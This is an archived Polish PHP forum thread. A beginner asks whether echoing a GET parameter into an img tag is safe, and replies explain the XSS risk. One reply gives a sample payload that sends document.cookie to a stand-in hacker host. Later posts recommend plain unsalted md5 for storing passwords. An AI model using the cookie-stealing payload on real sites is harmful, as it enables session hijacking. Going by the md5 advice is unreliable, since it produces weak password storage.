Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Bezpieczeństwo..
Forum PHP.pl > Forum > PHP
lol666
Pytam się na wszelki wypadek.

  1. <?php
  2. echo '<img src="' . $_GET['adres'] . '">';
  3. ?>


Są jakieś inne metody umieszczania grafik w php?
Z góry dzięki.
nazihipi
nie jest bezpieczny

Temat: Bezpieczenstwo skryptow php
My4tic
No jak bedziesz to robił tak jak napisałes to na pewno nie bedzie to bezpieczne. Filtruj dane pobierane od usera takimi funkcjami jak http://pl2.php.net/manual/pl/function.strip-tags.php" title="Zobacz w manualu php" target="_manual. Poza tym możesz wprowadzić limit długości, sprawdzac rozszerzenie... możliwości jest sporo.
lol666
Mam jeszcze pare pytań:

1. o co chodzi z tym /etc/passwd

2. Apropo mojego kodu nie rozumiem jak ktoś miałby zagrozić mojemy skryptowi lub serwerowi (sry jestem zielony w php). Podajcie może jakiś przykład.

Dzięki za wszelkie porady happy.gif Pozdro z nad morza

Maks
nasty
Cytat
o co chodzi z tym /etc/passwd

chodzi o to ze to bylo nie bezpiczny plik, i sporo wlamow bylo robionych po odczytaniu hasla z niego (brute-force) ale to jakies 10 lat temu winksmiley.jpg
nazihipi
Cytat
2. Apropo mojego kodu nie rozumiem jak ktoś miałby zagrozić mojemy skryptowi (sry jestem zielony w php). Podajcie może jakiś przykład.



  1. http://www.twojastrona.pl/index.php?adres=dupa_admina.jpg

  1. <?php
  2. echo '<img src="' . $_GET['adres'] . '">';
  3. ?>

output:
  1. <img src='dupa_admina.jpg'>

a co najgorsze można próbować ataków, polegających na wrzucaniu fragmentów kodu php, które namieszają

pozytaj w manualu
Cysiaczek
/etc/passwd to plik zawierający hasła (zwykle kodowane) użytkowników serwera (w domyślnej konfiguracji). Podstawy Linuxa laugh.gif

Ktoś może Ci po prostu wpisać w url ścieżkę do tego pliku i ewentualnie coś jeszcze przydkiego porobić. tongue.gif

Pozdrawiam.
dr_bonzo
Cytat
2. Apropo mojego kodu nie rozumiem jak ktoś miałby zagrozić mojemy skryptowi (sry jestem zielony w php). Podajcie może jakiś przykład.


  1. <?php
  2. echo '<img src="' . $_GET['adres'] . '">';
  3. ?>


index.php?adres="><script>document.location='http://www.strona-hackera.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>

cos w tym stylu -- czyli haker (cracker -- no niewazne) pobierze wartosc naszego ciacha sesyjnego, co moze mu pozwolic zalogowac sie na nasze konto bez znajomosci hasla.

Przyklad stad: http://www.cgisecurity.com/articles/xss-faq.shtml


index.php?adres="http://server.hackera.com/cookie_harvester.php?
lol666
JEZU :exclamation: SAMOZAGŁADA!

Dobra kontynuuje pytania:

Wiem że algorytm z dziedziny kryptografii... (http://pl.wikipedia.org/wiki/MD5), ale jakie jest jego praktyczne zastosowanie w php?
kszychu
Cytat(Cysiaczek @ 24.08.2006, 00:18 ) *
/etc/passwd to plik zawierający hasła (zwykle kodowane) użytkowników serwera (w domyślnej konfiguracji). Podstawy Linuxa laugh.gif

Głupoty pleciesz. /etc/passwd nie zawiera żadnych haseł, ale i tak nie wskazane jest, by ktoś obcy poznał jego zawartość.

@lol666: praktyczne zastosowanie md5 w php (wszędzie indziej z resztą też) to przede wszystkim kodowanie haseł, sumy kontolne plików i pewnie inne jeszcze. Ja używam głównie do tego.
Ja_Szczur
np. przechowywanie haseł w bazie

przy rejestracji:
  1. <?php
  2. zapisz_usera( $_POST['nick'] , md5( $_POST['pass'] ) , $_POST['email'] );
  3. ?>


przy logowaniu:
  1. <?php
  2. if( md5( $_POST['pass'] ) == $haslo_z_bazy_shashowane_md5 )
  3.  // zalogowany
  4. else
  5.  // złe hasło!
  6. ?>


takie hasło ma zawsze 32 znaki
no i jest mała szansa na powtórzenie takiego hash'a
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.